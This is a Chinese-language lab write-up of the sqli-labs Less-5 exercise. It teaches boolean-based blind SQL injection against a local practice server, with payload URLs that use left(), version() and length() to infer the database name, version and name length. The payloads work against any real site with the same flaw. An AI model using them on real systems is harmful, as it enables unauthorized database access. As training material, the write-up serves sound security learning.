Less-5这一关，我们可以看出 不会再显示出数据库相关的信息了，错误不显示，正确只显示一句话。

 

 所以我们就不能使用Less1——Less5的那样的方式了

接下来我们就开始学习盲注!

1.判断数据库的第一个字母是什么？

使用到：left(database(),1)='a'    判断数据库的名字第一个字母是否为a

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)='a' --+

我们发现报错，页面没有任何显示。

 

 我们还以使用二分法，来判断数据库来确定数据库名第一个字母的范围，给出语句

判断数据库第一个字母是否在字母 j 后面；如果在j后面，那么肯定会比j大。

 

如果 判断字母比本身数据库要大，则就不会显示 

 

还可以继续使用迭代增添字母来判断数据库的下一个字母的显示。

 我们发现，没有显示，所以我们往往可以根据这个来搜集到数据库的一些信息。

2、判断数据库的版本

判断数据库版本第一个个数字是否为5

可以发现，正确弹出语句，并无报错。

 

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(version(),3)='5.7' --+ 

继续迭代判断数据库版本，可以发现，版本为5.7

 

3、 判读数据库名的长度

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=7 --+，发现并没有显示正确语句

 

 判读长度等于8的时候，发现正确，报出正常语句

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=8

 

 所以，根据1此判断数据库的长度为8；

 

根据这些，发现只需要重新造*即可。